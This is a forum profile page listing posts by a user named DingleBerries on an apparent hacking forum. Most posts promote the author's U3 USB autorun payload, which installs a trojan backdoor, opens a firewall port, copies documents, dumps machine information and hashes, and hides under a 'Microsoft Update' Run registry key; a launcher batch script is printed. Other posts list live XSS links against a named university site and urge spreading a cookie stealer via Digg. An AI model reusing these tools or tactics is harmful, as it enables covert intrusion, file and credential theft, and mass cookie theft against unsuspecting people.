DingleBerries
-
Posts
1,291 -
Joined
-
Last visited
Posts posted by DingleBerries
-
-
You can also try to flip the bit and mount it as a hard drive instead of a removable drive to sort of force mount it so that you can format it. -
[sic] but how do I flash the usb-drive with it?
Universal Customizer. There are a few versions floating around. The newest version works in vista as well as on 4GB< drives.
Does leroy jenkis work with an router that blocks portsleroy jenkis just starts the payload, makPNF.exe is the actual Trojan and atm it does not. Later I may release a UDP version that will work on routers that block ports.
Is it possible to get the usb-drive not showing up options when inserting it what to do with it?I have no idea what that even means.
Does it only seach in C:\ and is it possible to seach for specific namesIt searches HOME DRIVE/HOMEPATH, so if your drive letter is F:\ it will still work. The rest of the payload relies on the drive being the C:\ drive but that isnt a hard fix, remember this was done in less than a day. Right now it will only do extensions, Adding complete file names never really crossed my mind, i will look into it though.
Cheers!
-
-
0x3, I am a bit confused about your question. Are you talking about installing asp shells and disabling firewall? I do not have any Server 2003 VMs atm, but that is easy to get ;). I was thinking about rewriting the backdoor in the future to support more things, and making it drop a file should be easy, i.e. have it sitting in the code then print it out to a text document named shell.php. It may take me a while, school and what not, but I will try to release what I can when I can(not all of my tools are here :, save the good stuff for my self :P).
-
For all of your malware related needs go to http://www.offensivecomputing.net/
BE WARNED all of those are real viruses so be sure its on a vm or an isolated network.. Also conficker C can tell if its running in a VM and will modify its behaviour as such
-
And now you have sum XSS
http://www.msoe.edu/campus/directory/detai...3E%3C/SCRIPT%3E
http://www.msoe.edu/campus/directory/detai...SCRIPT%3E%22%3E
http://www.msoe.edu/campus/directory/detai...3C%3C/SCRIPT%3E
Now what you do is get an xss worm or cookie stealer and submit that to digg(because they are all retarded) and have people click in and steal their booty. Reddit wouldnt fall for that shit.
-
keylogger would work much better in this situation, or a scam page since its a local attack.
-
So what you want is a large logging firewall? Interceptor is invisible meant only for tapping a network. I do have a question, is this full duplex, also usually with my taps I need on NIC for RX and another for TX.
-
Give me remote desktop and I will break it for you, at a price of course. Shit isnt very hard to do, hell if your router can accept outside connections I can do it at my place. But a better diagram of your network would help. Is it a repeater?
-
Let me explain it a bit more in detail.
There are two folders(CD, Flash). The Flash folder has 2 files(2 exes and a bat). Autorun runs > Leroy Jenkins then opens a port in the firewall, copies the trojan(makPMF i think was the name), and then runs the bat script that searches for the drive containing DingleBerries.exe.
On the flash side, just put all the files on the root of your drive.Dingleberries.exe gabs some info from the pc, writes the computers info to a txt file, rights the registry value to autorun the trojan, and then calls slurp.exe(you can remove slup and replace it with PWDUMP just rename it slurp.exe) Slurp looks in the ini to find out what file types you want slurped up and puts then in a folder like so, COMPUTERNAME > SLURPED FILES. One issue is that if the folder already exist it will stop everything. The client.pyw will require you have python installed. Go to one of the folders that has the computer info dump and type that IP into the client, you can now send commands.
To use this you will need to make an ISO of the cd folder and flash that to the u3 side.
-
Beggars cant be choosers. This is a first release made in less than 5 hours, maybe if we could get some more coders involved then there could be better product, but for now its me.. alone doing the work. All the info given is more then enough. Get wget on the machine and it is completely owned. From there you can download and execute other packages.
And like it says, want to expand? Add more shit to then end of the bat to execute.
-
how do you get a list of email accounts on that server ?I guess you use a dictonary attackbrute force
-
-
Simple Nmap 4.85BETA5 command to scan for Downadup/Conficker.
nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1 [targetnetworks]
But what does it all mean?
-PN means to treat all hosts as online, and skip host discovery, which basically means don\'t try to ping ths hosts. This is useful because lots of hosts/firewalls drop icmp traffic.
-T4 is used to speed up the scan
-p139,445 tells it to scan those ports, which are related to samba windows file sharing
-n says don\'t try dns resolution
-v means make it spit out more information(aka verbose)
--script=smb-check-vulns runs the lua script smb-check-vulns, which appears to check for a few different vulnerablities. This script gets passed the safe=1 option which according to the web page tells the script to only do checks which are presumably safe for the system you are scanning against; the page warns that unsafe checks on a compromised system may cause it to crash.
Also more info on the approaching doom
-
Lets make a group and fag to mac hating!
-
Dingle Berries Load
What you need
A U3 device
Python(for the trojan client)
What it does?
Install a backdoor(Terry the Trojan)
Slurps Documents
Opens Port for trojan
Dumps PC info
Writes a startup to the registry as;
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Microsoft Update >>>>> c:\makPNF.exe
Want to update it? Add some new shit to the end of the .bat file.
Thank You in advance to those who click.UPDATE
Use this .bat file instead.
[size="1"]for %%i in (B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do if exist %%i:\DingleBerries.exe set dir=%%i cd /d %dir%: DingleBerries.exe[/size]
-
Just finished a payload. I will update this post with the link in a min.
LINK
-
When did they forget their passwords? Are the cookies still stored on the computer? Yahoo has a weak hash when handing out cookies so the password can be decoded and used.
-
No reason to kill AV if your program isnt picked up. So far I have this working:
Create dir based on computers name
Write a log of info from the computer, names, home drive, home path, ip address
Create a directory to put slurped documents
slurp documents
Next I will be implementing a backdoor and a few other fun things. Still needs more ideas. Any one use delphi? I have a nice yahoo! webcam hack.
-
Phishing page + social engineering + browser address bar exploit = WIN
-
So now you wont be able to see if you have the worm? Why shut down, all you are doing is evading the inevitable.
-
That wouldnt be to hard to implement. Have an .ini, or .conf file where the user inputs the strings they want to run, i.e;
hack.exe -i -l
and have the proggy execute as such. Like a cross between nircmd and batch.
-
BLIZZARD
DIABLO III!
-
I have a tool to dump the lmhashs, just most people do not have rainbow tables and brute forcing takes a while. I have some free time today to work on it all.
metasploit.com defaced?
in Everything Else
Posted
April Fools
http://www.metasploit.com/framework/download/
Damnit digip already posted.